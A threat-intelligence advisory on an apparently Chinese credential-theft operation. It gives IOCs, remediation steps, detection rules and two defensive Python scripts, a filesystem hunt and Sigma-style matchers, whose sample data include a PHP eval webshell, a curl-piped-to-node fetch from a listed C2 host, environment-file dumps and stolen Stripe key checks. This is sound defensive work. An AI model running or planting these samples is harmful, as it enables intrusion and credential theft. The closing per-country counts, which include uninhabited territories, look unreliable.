Chinese Cybercrime Infrastructure: OpenClaw / Paperclip Operation

Tags: OpenClaw, Log4Shell, React2Shell, Chinese Cybercrime
An automated Chinese cybercrime operation blends large-scale exploitation with structured orchestration and direct monetization. Coordinated through a centralized backend and an agent-based workflow system, it performs internet-scale reconnaissance via FOFA and 360Quake, exploits vulnerable web applications using React2Shell, extracts AI API keys, Stripe credentials and database secrets, and immediately validates the stolen data for financial gain. Primary targets are Web3 platforms, fintech services and cloud-native organizations.

Indicators of Compromise

soft-silence-d978.13544681192.workers.dev
anson-aeromarine-ocularly.ngrok-free.dev
kf.unpkg.top

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

Remediation

1 -- Isolate: Network-isolate the affected server.
  Do not shut down -- keep the host running to preserve memory, since the NKN agent is fileless. Block all IOCs at the perimeter. Terminate active sessions.

2 -- Preserve: Collect forensic evidence.
  Take a memory dump (avml or LiME). Preserve bash_history, /tmp contents, web server logs, netstat -anp output and /proc/*/cmdline. Take a disk image before any cleanup.

3 -- Hunt: Search for and remove all persistence mechanisms.
  Kill and delete from /tmp: d2, pl, l64, cf-client, p2p-client. Scan web directories for webshells (.php, .jsp, .aspx). Check cron jobs and systemd services. Run YARA-7.1 through YARA-7.4 (see Detection Quick Reference) on all web servers in the same network segment.

4 -- Rotate: Rotate every credential on the affected system.
  AI API keys (OpenAI, Anthropic, Gemini, Azure, DeepSeek, Moonshot, Firecrawl), Stripe sk_live_* keys, GitHub tokens, database passwords, AWS access keys. Check Stripe logs for /v1/balance calls and unauthorized charges.

5 -- Audit: Audit API usage for active key abuse.
  OpenAI/Anthropic usage dashboards: look for off-hours spikes or unknown IPs. Stripe logs: filter /v1/account and /v1/balance calls. GitHub security log: unauthorized API calls or repository access. AWS CloudTrail: unexpected Lambda invocations.

6 -- Rebuild: Rebuild from a trusted clean image.
  Do not restore from the compromised disk. Deploy application code from version control. Inject secrets via a secrets manager -- never use .env files again on internet-exposed servers. Validate that the CVE patches are applied before bringing the new instance online.
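The hunt in steps 3 and 4 above, written out as a read-only sweep that can be pointed at the live root or at a mounted disk image. This is an added example, not tooling from the original advisory or the operator's kit: it flags the named /tmp droppers, webshell-like files under the web root, cron and systemd units that reference the campaign's tunnel and C2 tooling, and .env files that still hold the credential names the operation harvests (values are masked in the output). The webshell sink list, the scanned directories and the sample filesystem are assumptions constructed for the demo. It covers disk only; the fileless NKN agent lives in memory, which is why steps 1 and 2 insist on a memory dump before anything is touched.

```python
import os
import re
import tempfile
from dataclasses import dataclass, field

# Artifact names and strings taken from the remediation steps above.
TMP_DROPPERS = {"d2", "pl", "l64", "cf-client", "p2p-client"}
WEBSHELL_EXT = {".php", ".jsp", ".aspx"}
# Code-execution sinks a webshell wraps around attacker input (heuristic chosen for this example).
WEBSHELL_RE = re.compile(rb"\b(?:eval|system|passthru|shell_exec|exec|assert|Runtime\.getRuntime)\s*\(", re.I)
# Tunnel / C2 tooling names that have no business in cron or systemd units.
PERSIST_RE = re.compile(r"cf-client|trycloudflare\.com|p2p-client|nkn\.org|workers\.dev|/tmp/(?:d2|pl|l64)\b")
# Secret names the operation harvests from .env files; values are masked before reporting.
SECRET_RE = re.compile(
    r"^(?P<name>[A-Z0-9_]*(?:OPENAI|ANTHROPIC|GEMINI|DEEPSEEK|MOONSHOT|FIRECRAWL|STRIPE|GITHUB|AWS|DATABASE)[A-Z0-9_]*)"
    r"=(?P<val>\S+)", re.M)


@dataclass
class Findings:
    droppers: list = field(default_factory=list)
    webshells: list = field(default_factory=list)
    persistence: list = field(default_factory=list)
    exposed_secrets: list = field(default_factory=list)  # (path, variable, masked value)


def _mask(value):
    return value[:8] + "..." if len(value) > 8 else "***"


def hunt(root, web_dirs=("var/www",), tmp_dir="tmp",
         unit_dirs=("etc/cron.d", "etc/systemd/system", "var/spool/cron")):
    """Read-only sweep of a root ('/' on the live host, or a mounted disk image)."""
    f = Findings()
    tmp = os.path.join(root, tmp_dir)
    if os.path.isdir(tmp):
        f.droppers = sorted(os.path.join(tmp, n) for n in os.listdir(tmp) if n in TMP_DROPPERS)
    for wd in web_dirs:
        for dirpath, _, files in os.walk(os.path.join(root, wd)):
            for name in files:
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    data = fh.read()
                if os.path.splitext(name)[1].lower() in WEBSHELL_EXT and WEBSHELL_RE.search(data):
                    f.webshells.append(path)
                if name == ".env":  # step 6: these should have been in a secrets manager
                    for m in SECRET_RE.finditer(data.decode("utf-8", "replace")):
                        f.exposed_secrets.append((path, m["name"], _mask(m["val"])))
    for ud in unit_dirs:
        for dirpath, _, files in os.walk(os.path.join(root, ud)):
            for name in files:
                path = os.path.join(dirpath, name)
                with open(path, "r", errors="replace") as fh:
                    if PERSIST_RE.search(fh.read()):
                        f.persistence.append(path)
    f.persistence.sort()
    return f


def build_sample(root):
    """Constructed sample filesystem for the demo; none of this is real evidence."""
    files = {
        "tmp/l64": b"\x7fELF", "tmp/cf-client": b"\x7fELF", "tmp/notes.txt": b"harmless",
        "var/www/html/index.php": b"<?php echo 'hello'; ?>",
        "var/www/html/uploads/img.php": b"<?php @eval($_POST['c']); ?>",
        "var/www/app/.env": (b"OPENAI_API_KEY=sk-EXAMPLE\nSTRIPE_SECRET_KEY=sk_live_EXAMPLE000000\n"
                             b"DATABASE_URL=postgres://u:p@db/app\nAPP_NAME=demo\n"),
        "etc/cron.d/update": b"@reboot root /tmp/cf-client tunnel --url ssh://127.0.0.1:22\n",
        "etc/systemd/system/p2p.service": b"[Service]\nExecStart=/tmp/p2p-client -s mayun\n",
        "etc/systemd/system/nginx.service": b"[Service]\nExecStart=/usr/sbin/nginx\n",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Run the hunt over the constructed sample and return root-relative results."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        f = hunt(root)
        rel = lambda p: os.path.relpath(p, root)
        return {"droppers": [rel(p) for p in f.droppers],
                "webshells": [rel(p) for p in f.webshells],
                "persistence": [rel(p) for p in f.persistence],
                "exposed_secrets": [(rel(p), n, v) for p, n, v in f.exposed_secrets]}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Every hit on a live host goes into the evidence set before it is killed or deleted; run `hunt("/")` on the isolated box, or `hunt("/mnt/image")` against the disk image from step 2, and treat the webshell regex as a triage filter rather than a verdict.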



Sector-Specific Priority Actions

Web3 / Crypto
  Key risk: Primary FOFA target; ~100K crypto addresses monitored by the attacker.
  Priority action: Rotate wallet integration keys. Audit smart contract access logs. Verify that no unauthorized address monitoring is in place.

Fintech / Payments
  Key risk: Stripe sk_live_* keys are validated and tested within hours of harvest.
  Priority action: Check Stripe logs for /v1/account and /v1/balance calls now. Rotate all live Stripe keys. Enable Radar fraud rules.

AI / ML Platforms
  Key risk: OpenAI, Anthropic, Gemini, DeepSeek, Moonshot and Firecrawl keys are the primary harvest target.
  Priority action: Rotate all AI keys immediately. Check usage dashboards for abnormal consumption. Set spend alerts per key.

Cloud-Native / SaaS
  Key risk: AWS Lambda credentials, DATABASE_URL and GitHub tokens are harvested, enabling lateral movement into cloud accounts.
  Priority action: CloudTrail: unauthorized Lambda calls. GitHub: token misuse and secret scanning alerts. Rotate all cloud credentials.

Security Vendors
  Key risk: Explicitly targeted in FOFA queries; hold customer intelligence and elevated trust relationships.
  Priority action: Audit your own FOFA visibility. Patch all internet-exposed React and Java apps. Review customer data access logs.



Detection Quick Reference

Rule (type, priority): what it detects

Sigma-8.1 (SIEM, CRITICAL): Environment variable dump executed from a web server process -- direct exploitation indicator.
Sigma-8.2 (SIEM, HIGH): curl URL | node or echo <base64> | node -- fileless NKN C2 agent delivery.
Sigma-8.3 (SIEM, HIGH): cf-client together with trycloudflare.com -- Cloudflare tunnel SSH persistence.
Sigma-8.4 (SIEM, HIGH): Outbound connection to nkn.org:30003 -- decentralized C2; no legitimate enterprise use.
Sigma-8.5 (SIEM, CRITICAL): api.stripe.com together with sk_live_ in a process command line -- stolen Stripe key validation.
YARA-7.1 (EDR, HIGH): React2Shell exploit scripts (3.py / 11.py): FOFA keywords, WAF bypass, env dump.
YARA-7.2 (EDR, HIGH): NKN fileless C2 agent: mainnet-seed addresses, CONTROL_ID, workers.dev, Node crypto.
YARA-7.3 (EDR, HIGH): Credential harvest file: AI API key names, Stripe strings, harvested_keys pattern.
YARA-7.4 (EDR, HIGH): Persistence: cf-client + trycloudflare.com, p2p-client + mayun, /tmp/l64 drop path.
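The five Sigma-8.x rows above, expressed as plain Python matchers over process-creation and network events and run against constructed sample telemetry, so the logic can be checked before it is ported into a SIEM. This is an added example, not the campaign's published Sigma rules; the event field names (type, parent, image, cmdline, dest_host, dest_port), the set of images treated as "web server" parents for Sigma-8.1, and the sample events are assumptions to be mapped onto your own EDR schema. The hostnames in the samples come from the IOC list; keys and URLs are placeholders.

```python
import re

# Parent images treated as "web server process" for Sigma-8.1 (assumption; tune to your stack).
WEB_SERVER_PARENTS = {"nginx", "httpd", "node", "next-server", "java", "php-fpm", "gunicorn", "uwsgi"}
# env / printenv / cat .env / cat /proc/<pid>/environ as a standalone word in a command line.
ENV_DUMP_RE = re.compile(r"(?<![\w/.-])(?:env|printenv|cat\s+\S*\.env\b|cat\s+/proc/\S*/environ)(?![\w-])")
PIPE_TO_NODE_RE = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*node\b"                               # curl URL | node
    r"|\becho\b[^|]*\|\s*(?:base64\s+(?:-d|--decode)\s*\|\s*)?node\b"  # echo <b64> | [base64 -d |] node
)
NKN_HOST_RE = re.compile(r"(?:^|\.)nkn\.org$", re.I)


def _basename(path):
    return (path or "").rsplit("/", 1)[-1]


def sigma_8_1(e):  # env dump spawned by the web server itself
    return (e.get("type") == "process" and _basename(e.get("parent")) in WEB_SERVER_PARENTS
            and bool(ENV_DUMP_RE.search(e.get("cmdline", ""))))


def sigma_8_2(e):  # fileless agent delivery: download or decode piped straight into node
    return e.get("type") == "process" and bool(PIPE_TO_NODE_RE.search(e.get("cmdline", "")))


def sigma_8_3(e):  # Cloudflare tunnel persistence
    text = e.get("image", "") + " " + e.get("cmdline", "")
    return e.get("type") == "process" and "cf-client" in text and "trycloudflare.com" in text


def sigma_8_4(e):  # NKN seed node traffic
    return (e.get("type") == "network" and e.get("dest_port") == 30003
            and bool(NKN_HOST_RE.search(e.get("dest_host", ""))))


def sigma_8_5(e):  # stolen Stripe key validated from the command line
    c = e.get("cmdline", "")
    return e.get("type") == "process" and "api.stripe.com" in c and "sk_live_" in c


RULES = [("Sigma-8.1", "CRITICAL", sigma_8_1), ("Sigma-8.2", "HIGH", sigma_8_2),
         ("Sigma-8.3", "HIGH", sigma_8_3), ("Sigma-8.4", "HIGH", sigma_8_4),
         ("Sigma-8.5", "CRITICAL", sigma_8_5)]


def detect(event):
    """Return [(rule, priority)] for every rule the event triggers."""
    return [(name, prio) for name, prio, fn in RULES if fn(event)]


def run(events):
    """Map event id -> triggered rule names; events that trigger nothing are omitted."""
    hits = {}
    for e in events:
        names = [name for name, _ in detect(e)]
        if names:
            hits[e["id"]] = names
    return hits


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": "/usr/bin/node", "image": "/bin/sh",
     "cmdline": "sh -c 'env; cat /app/.env'"},
    {"id": 2, "type": "process", "parent": "/bin/sh", "image": "/bin/bash",
     "cmdline": "bash -c 'curl -s https://soft-silence-d978.13544681192.workers.dev/a | node'"},
    {"id": 3, "type": "process", "parent": "/bin/bash", "image": "/tmp/cf-client",
     "cmdline": "/tmp/cf-client tunnel --url ssh://127.0.0.1:22 --hostname demo.trycloudflare.com"},
    {"id": 4, "type": "network", "image": "/usr/bin/node",
     "dest_host": "mainnet-seed-0001.nkn.org", "dest_port": 30003},
    {"id": 5, "type": "process", "parent": "/bin/sh", "image": "/usr/bin/curl",
     "cmdline": "curl -s https://api.stripe.com/v1/balance -u sk_live_EXAMPLE:"},
    {"id": 6, "type": "process", "parent": "/usr/sbin/cron", "image": "/usr/bin/printenv",
     "cmdline": "printenv"},  # env dump, but not from a web server: must not fire Sigma-8.1
    {"id": 7, "type": "process", "parent": "/usr/bin/node", "image": "/usr/bin/node",
     "cmdline": "node server.js"},
    {"id": 8, "type": "network", "image": "/usr/bin/node", "dest_host": "api.openai.com", "dest_port": 443},
]

if __name__ == "__main__":
    for eid, names in run(SAMPLE_EVENTS).items():
        print(eid, names)
```

Event 6 is the false-positive control: a cron-launched `printenv` is routine, and Sigma-8.1 only becomes a direct exploitation indicator when the parent is the web server process, which is why the rule keys on the parent image rather than on the command alone.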

IOC Block List

Indicator -- Type -- Block method

124[.]220[.]164[.]14 -- C2 IP / reverse shell (port 33306) -- Firewall egress, all ports
soft-silence-d978[.]13544681192[.]workers[.]dev -- Fileless C2 delivery -- DNS block + proxy filter
d6[.]tfdl[.]net -- Payload delivery (NKN agent, cf-client) -- DNS block + proxy filter
anson-aeromarine-ocularly[.]ngrok-free[.]dev -- Tor proxy endpoint -- DNS block
kf[.]unpkg[.]top -- Malicious domain -- DNS block
deltajohnsons[.]com -- FOFA account registration domain -- DNS block + threat intel feed
*.nkn.org port 30003 -- NKN P2P C2 seed nodes -- Firewall: block outbound port 30003
[email protected] -- Operator email -- Threat intel feed
[email protected] -- Operator account -- Threat intel feed

Block the specific hostnames listed, not their parent zones: workers.dev, ngrok-free.dev and trycloudflare.com are shared platforms that also carry legitimate traffic.

Observed Countries (250)

AD (242)
AE (475)
AF (929)
AG (704)
AI (762)
AL (840)
AM (286)
AO (718)
AQ (340)
AR (830)
AS (706)
AT (815)
AU (482)
AW (357)
AX (225)
AZ (296)
BA (483)
BB (940)
BD (11)
BE (558)
BF (910)
BG (907)
BH (5)
BI (839)
BJ (804)
BL (792)
BM (273)
BN (753)
BO (70)
BQ (556)
BR (861)
BS (474)
BT (722)
BV (950)
BW (300)
BY (136)
BZ (327)
CA (773)
CC (655)
CD (730)
CF (933)
CG (470)
CH (683)
CI (643)
CK (874)
CL (353)
CM (167)
CN (93)
CO (202)
CR (896)
CU (538)
CV (167)
CW (86)
CX (241)
CY (88)
CZ (478)
DE (14)
DJ (952)
DK (414)
DM (118)
DO (182)
DZ (475)
EC (95)
EE (994)
EG (390)
EH (206)
ER (469)
ES (353)
ET (679)
FI (140)
FJ (487)
FK (218)
FM (182)
FO (797)
FR (941)
GA (782)
GB (373)
GD (790)
GE (726)
GF (379)
GG (671)
GH (642)
GI (662)
GL (568)
GM (883)
GN (973)
GP (101)
GQ (916)
GR (378)
GS (438)
GT (767)
GU (343)
GW (345)
GY (679)
HK (218)
HM (626)
HN (611)
HR (380)
HT (954)
HU (598)
ID (391)
IE (377)
IL (577)
IM (406)
IN (99)
IO (628)
IQ (963)
IR (961)
IS (321)
IT (153)
JE (282)
JM (750)
JO (989)
JP (574)
KE (690)
KG (478)
KH (795)
KI (252)
KM (610)
KN (228)
KP (670)
KR (445)
KW (601)
KY (632)
KZ (417)
LA (159)
LB (80)
LC (871)
LI (295)
LK (942)
LR (562)
LS (972)
LT (702)
LU (234)
LV (934)
LY (232)
MA (700)
MC (544)
MD (960)
ME (396)
MF (475)
MG (286)
MH (541)
MK (772)
ML (312)
MM (555)
MN (476)
MO (48)
MP (13)
MQ (751)
MR (265)
MS (94)
MT (550)
MU (978)
MV (849)
MW (761)
MX (777)
MY (542)
MZ (625)
NA (766)
NC (731)
NE (358)
NF (226)
NG (585)
NI (397)
NL (630)
NO (443)
NP (117)
NR (836)
NU (809)
NZ (494)
OM (690)
PA (340)
PE (767)
PF (590)
PG (789)
PH (713)
PK (19)
PL (668)
PM (913)
PN (205)
PR (885)
PS (132)
PT (272)
PW (674)
PY (21)
QA (46)
RE (626)
RO (848)
RS (731)
RU (459)
RW (411)
SA (343)
SB (528)
SC (385)
SD (304)
SE (458)
SG (179)
SH (204)
SI (407)
SJ (622)
SK (41)
SL (438)
SM (705)
SN (998)
SO (795)
SR (923)
SS (849)
ST (162)
SV (379)
SX (749)
SY (26)
SZ (983)
TC (477)
TD (429)
TF (114)
TG (841)
TH (852)
TJ (660)
TK (200)
TL (68)
TM (590)
TN (236)
TO (798)
TR (542)
TT (186)
TV (74)
TW (526)
TZ (942)
UA (354)
UG (47)
UM (772)
US (422)
UY (484)
UZ (146)
VA (634)
VC (681)
VE (593)
VG (293)
VI (491)
VN (488)
VU (494)
WF (289)
WS (969)
XK (237)
YE (32)
YT (272)
ZA (491)
ZM (701)
ZW (21)